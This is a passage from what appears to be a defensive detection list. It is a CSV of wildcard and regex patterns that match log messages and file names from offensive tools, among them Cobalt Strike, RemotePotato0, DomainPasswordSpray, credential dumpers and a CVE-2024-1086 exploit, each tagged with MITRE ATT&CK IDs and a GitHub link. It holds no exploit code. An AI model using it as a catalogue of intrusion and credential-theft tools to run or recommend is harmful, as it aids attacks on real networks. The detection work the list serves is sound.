- T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","CVE-2024-1086 POC","10","10","1898","237","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z" "*] going to inject sql payload into the external mainframe smart contract interface*",".{0,1000}\]\sgoing\sto\sinject\ssql\spayload\sinto\sthe\sexternal\smainframe\ssmart\scontract\sinterface.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","CVE-2024-1086 POC","10","10","1898","237","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z" "*] INFO: DLL IS VULNERABLE TO DOWNLOADS INSTALLER TEST-*",".{0,1000}\]\sINFO\:\sDLL\sIS\sVULNERABLE\sTO\sDOWNLOADS\sINSTALLER\sTEST\-.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","0","N/A","9","6","516","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z" "*] INFO: DLL IS VULNERABLE TO EXECUTABLE TEST*",".{0,1000}\]\sINFO\:\sDLL\sIS\sVULNERABLE\sTO\sEXECUTABLE\sTEST.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","0","N/A","9","6","516","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z" "*] Injecting into remote process using direct syscalls*",".{0,1000}\]\sInjecting\sinto\sremote\sprocess\susing\sdirect\ssyscalls.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation 
tools","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","10","6","524","52","2024-04-05T14:21:15Z","2023-04-05T09:39:33Z" "*] Injecting malicious scheduled task into downloaded GPO*",".{0,1000}\]\sInjecting\smalicious\sscheduled\stask\sinto\sdownloaded\sGPO.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "*] Kerberoast user * successfully!*",".{0,1000}\]\sKerberoast\suser\s.{0,1000}\ssuccessfully!.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","7","4","326","30","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z" "*] Killing EventLog Threads (if running)*",".{0,1000}\]\sKilling\sEventLog\sThreads\s\(if\srunning\).{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing 
(Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","0","N/A","10","5","452","69","2024-04-19T20:15:04Z","2023-07-24T13:59:16Z" "*] Listing GraphRunner modules?*",".{0,1000}\]\sListing\sGraphRunner\smodules\?.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","#contentstrings","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*] LLMNR sniffer identified potential spoofing target:*",".{0,1000}\]\sLLMNR\ssniffer\sidentified\spotential\sspoofing\starget\:.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","9","2","105","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z" "*] LLMNR Sniffer identified previously sniffed name*",".{0,1000}\]\sLLMNR\sSniffer\sidentified\spreviously\ssniffed\sname.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","9","2","105","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z" "*] Modifying * attribute of GPO on fakedc to *",".{0,1000}\]\sModifying\s.{0,1000}\sattribute\sof\sGPO\son\sfakedc\sto\s.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through 
gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "*] Modifying gPCFileSysPath attribute of GPO on fakedc to *",".{0,1000}\]\sModifying\sgPCFileSysPath\sattribute\sof\sGPO\son\sfakedc\sto\s.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "*] Password spraying has begun with *",".{0,1000}\]\sPassword\sspraying\shas\sbegun\swith\s.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","0","N/A","10","10","1636","362","2023-09-22T22:13:14Z","2016-10-04T23:37:37Z" "*] Password spraying is complete*",".{0,1000}\]\sPassword\sspraying\sis\scomplete.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","0","N/A","10","10","1636","362","2023-09-22T22:13:14Z","2016-10-04T23:37:37Z" "*] Powershell Persistence created*",".{0,1000}\]\sPowershell\sPersistence\screated.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - 
TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","197","30","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z" "*] Received DCOM NTLM type 3 authentication from the privileged client*",".{0,1000}\]\sReceived\sDCOM\sNTLM\stype\s3\sauthentication\sfrom\sthe\sprivileged\sclient.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","10","7","656","95","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z" "*] Screensaver Persistence created*",".{0,1000}\]\sScreensaver\sPersistence\screated.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","197","30","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z" "*] Sending credentials to pastebin ..*",".{0,1000}\]\sSending\scredentials\sto\spastebin\s\.\..{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","script content","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*] sending network-based smb hypertrojan with 
credentials*",".{0,1000}\]\ssending\snetwork\-based\ssmb\shypertrojan\swith\scredentials.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","CVE-2024-1086 POC","10","10","1898","237","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z" "*] Shellcode Decryption Started*",".{0,1000}\]\sShellcode\sDecryption\sStarted.{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","0","N/A","10","5","452","69","2024-04-19T20:15:04Z","2023-07-24T13:59:16Z" "*] Spoofing gPLink to *",".{0,1000}\]\sSpoofing\sgPLink\sto\s.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "*] Starting agent node actively.Connecting to *Reconnecting every * seconds*",".{0,1000}\]\sStarting\sagent\snode\sactively\.Connecting\sto\s.{0,1000}Reconnecting\severy\s.{0,1000}\sseconds.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - 
TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","10","10","2419","382","2024-04-11T05:50:18Z","2019-11-15T03:25:50Z" "*] Starting GraphSpy. Open in your browser by going to the url displayed below.*",".{0,1000}\]\sStarting\sGraphSpy\.\sOpen\sin\syour\sbrowser\sby\sgoing\sto\sthe\surl\sdisplayed\sbelow\..{0,1000}","offensive_tool_keyword","GraphSpy","Initial Access and Post-Exploitation Tool for AAD and O365 with a browser-based GUI","T1190 - T1133 - T1071 - T1082 - T1566.002","TA0001 - TA0006 - TA0007","N/A","N/A","Discovery","https://github.com/RedByte1337/GraphSpy","1","0","N/A","7","4","346","39","2024-04-17T19:18:08Z","2024-02-07T19:47:15Z" "*] Starting nullinux setup script*",".{0,1000}\]\sStarting\snullinux\ssetup\sscript.{0,1000}","offensive_tool_keyword","nullinux","Internal penetration testing tool for Linux that can be used to enumerate OS information/domain information/ shares/ directories and users through SMB.","T1087 - T1016 - T1077 - T1018","TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/m8sec/nullinux","1","0","N/A","7","6","551","100","2022-08-12T01:56:15Z","2016-04-28T16:45:02Z" "*] Starting RogueOxidResolver RPC Server listening on port*",".{0,1000}\]\sStarting\sRogueOxidResolver\sRPC\sServer\slistening\son\sport.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","10","10","1281","200","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z" "*] Starting share enumeration with thread limit of *",".{0,1000}\]\sStarting\sshare\senumeration\swith\sthread\slimit\sof\s.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - 
TA0001","N/A","N/A","Discovery","https://github.com/Hackcraft-Labs/SharpShares","1","0","N/A","9","1","29","6","2023-11-13T14:08:07Z","2023-10-25T10:34:18Z" "*] Starting the NTLM relay attack, launch ntlmrelayx on *",".{0,1000}\]\sStarting\sthe\sNTLM\srelay\sattack,\slaunch\sntlmrelayx\son\s.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","10","10","1281","200","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z" "*] Starting the RPC server to capture the credentials hash from the user authentication!!*",".{0,1000}\]\sStarting\sthe\sRPC\sserver\sto\scapture\sthe\scredentials\shash\sfrom\sthe\suser\sauthentication!!.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","10","10","1281","200","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z" "*] Startup Persistence created*",".{0,1000}\]\sStartup\sPersistence\screated.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","197","30","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z" "*] TARGET DLL IS NOT VULNERABLE TO *",".{0,1000}\]\sTARGET\sDLL\sIS\sNOT\sVULNERABLE\sTO\s.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","0","N/A","9","6","516","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z" "*] TeamFiltration V3.5.3 
PUBLIC*",".{0,1000}\]\sTeamFiltration\sV3\.5\.3\sPUBLIC.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*] to download void.zip using BitsTransfer*",".{0,1000}\]\sto\sdownload\svoid\.zip\susing\sBitsTransfer.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","script content","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*] Token does NOT have SE_ASSIGN_PRIMARY_NAME* using CreateProcessAsWithToken() for launching:*",".{0,1000}\]\sToken\sdoes\sNOT\shave\sSE_ASSIGN_PRIMARY_NAME.{0,1000}\susing\sCreateProcessAsWithToken\(\)\sfor\slaunching\:.{0,1000}","offensive_tool_keyword","TokenStealer","stealing Windows tokens","T1134 - T1055","TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/decoder-it/TokenStealer","1","0","#program content","10","2","154","24","2023-10-25T14:08:57Z","2023-10-24T13:06:37Z" "*] Triage SCCM Secrets*",".{0,1000}\]\sTriage\sSCCM\sSecrets.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential 
Access","https://github.com/zblurx/dploot","1","0","N/A","10","4","362","49","2024-04-03T13:35:18Z","2022-05-24T11:05:21Z" "*] Triggered Meterpreter oneliner on *",".{0,1000}\]\sTriggered\sMeterpreter\soneliner\son\s.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*] use the aes key from the beacon's online info to encrypt transfer data (base64 format*",".{0,1000}\]\suse\sthe\saes\skey\sfrom\sthe\sbeacon\'s\sonline\sinfo\sto\sencrypt\stransfer\sdata\s\(base64\sformat.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/darkr4y/geacon","1","0","N/A","10","10","1107","204","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" "*] use the public key from .beacon_keys to decrypt the beacon's online info*",".{0,1000}\]\suse\sthe\spublic\skey\sfrom\s\.beacon_keys\sto\sdecrypt\sthe\sbeacon\'s\sonline\sinfo.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","0","N/A","10","10","1107","204","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" "*] User can impersonate the following logins: *",".{0,1000}\]\sUser\scan\simpersonate\sthe\sfollowing\slogins\:\s.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation 
tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*] UserInitMprLogonScript Persistence created*",".{0,1000}\]\sUserInitMprLogonScript\sPersistence\screated.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","197","30","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z" "*] Writing obfuscated payload to *",".{0,1000}\]\sWriting\sobfuscated\spayload\sto\s.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*] You would like to generate .EXE using lauch4j? (y/n):*",".{0,1000}\]\sYou\swould\slike\sto\sgenerate\s\.EXE\susing\slauch4j\?\s\(y\/n\)\:.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*]Spawning Process with Spoofed Parent*",".{0,1000}\]Spawning\sProcess\swith\sSpoofed\sParent.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","0","N/A","10","3","254","46","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z" "*_adAclOutput*.csv*",".{0,1000}_adAclOutput.{0,1000}\.csv.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory 
.","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","0","AD Enumeration","7","10","906","155","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z"
"*_adAclOutput*.xlsx*",".{0,1000}_adAclOutput.{0,1000}\.xlsx.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","0","AD Enumeration","7","10","906","155","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" "*_backdoor.exe*",".{0,1000}_backdoor\.exe.{0,1000}","offensive_tool_keyword","frampton","PE Binary Shellcode Injector - Automated code cave discovery. shellcode injection - ASLR bypass - x86/x64 compatible","T1055 - T1548.002 - T1129 - T1001","TA0002 - TA0003- TA0004 -TA0011","N/A","N/A","POST Exploitation tools","https://github.com/ins1gn1a/Frampton","1","1","N/A","N/A","1","75","18","2019-11-24T22:34:48Z","2019-10-29T00:22:14Z" "*_backdoor.rb*",".{0,1000}_backdoor\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit.
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*_BloodHound.zip*",".{0,1000}_BloodHound\.zip.{0,1000}","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. 
Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","1","N/A","10","10","9395","1668","2024-02-09T22:50:23Z","2016-04-17T18:36:14Z" "*_cobaltstrike*",".{0,1000}_cobaltstrike.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*_dcsync.txt*",".{0,1000}_dcsync\.txt.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential 
Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*_dns_hijack/*.js*",".{0,1000}_dns_hijack\/.{0,1000}\.js.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*_dns_hijack/*.rb*",".{0,1000}_dns_hijack\/.{0,1000}\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*_dump_users.lst*",".{0,1000}_dump_users\.lst.{0,1000}","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1589 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","1","N/A","5","4","342","39","2024-03-28T10:30:53Z","2018-10-22T18:21:44Z" "*_enum_vault_creds*",".{0,1000}_enum_vault_creds.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
